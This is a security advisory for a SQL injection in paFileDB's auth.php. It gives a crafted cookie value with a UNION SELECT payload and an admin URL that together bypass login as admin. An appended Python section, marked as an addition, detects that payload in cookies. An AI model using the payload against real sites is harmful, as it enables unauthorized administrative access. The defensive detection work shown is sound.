PAFileDB Auth.PHP SQL Injection Vulnerability

No exploit is required.

The following example is available:

Create a cookie named pafiledbcookie with the following content:
[MD5 IP]%7CaG'+union+select+1,2,'pass',4,5/*%7Cpass

Then navigate to:
http://www.example.com/pafiledb.php?action=admin

Once there, the attacker is logged in as admin in the access control panel.
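
For defenders reviewing request logs or adding an input check in front of the application, the following added example (not part of the original advisory and not paFileDB code) inspects a pafiledbcookie value for the pattern shown above. The three-field layout is an assumption inferred from the %7C-separated example, and the function names, allowlist, and sample headers are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
# Assumed allowlist for the second field; adjust to the site's real account-name policy.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")
SQL_MARKERS = re.compile(r"'|\"|/\*|--|#|;|\bunion\b|\bselect\b", re.IGNORECASE)


def inspect_pafiledbcookie(raw_value):
    """Return a list of findings for one raw cookie value (empty list = looks clean)."""
    decoded = unquote_plus(raw_value)  # %7C becomes "|", "+" becomes a space
    fields = decoded.split("|")
    if len(fields) != 3:
        return [f"expected 3 pipe-separated fields, got {len(fields)}"]
    ip_hash, name, _third = fields  # the third field is not inspected here
    findings = []
    if not MD5_HEX.match(ip_hash.lower()):
        findings.append("field 1 is not a 32-character hex digest")
    if not SAFE_NAME.match(name):
        findings.append("field 2 contains characters outside the name allowlist")
    if SQL_MARKERS.search(name):
        findings.append("field 2 contains SQL syntax")
    return findings


def cookie_from_header(cookie_header, name="pafiledbcookie"):
    """Extract one cookie's raw value from a Cookie request header, or None."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


# Constructed sample headers: the first carries the value shown in the advisory
# (with a made-up digest in place of [MD5 IP]); the second is a benign-looking value.
SAMPLES = [
    "lang=en; pafiledbcookie=0123456789abcdef0123456789abcdef"
    "%7CaG'+union+select+1,2,'pass',4,5/*%7Cpass",
    "pafiledbcookie=0123456789abcdef0123456789abcdef"
    "%7Cadmin%7Cfedcba9876543210fedcba9876543210",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(inspect_pafiledbcookie(cookie_from_header(header)) or "clean")
```

A check like this flags or rejects the request before the cookie reaches the application; it does not replace fixing the query that consumes the cookie.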

Copyright 2010, SecurityFocus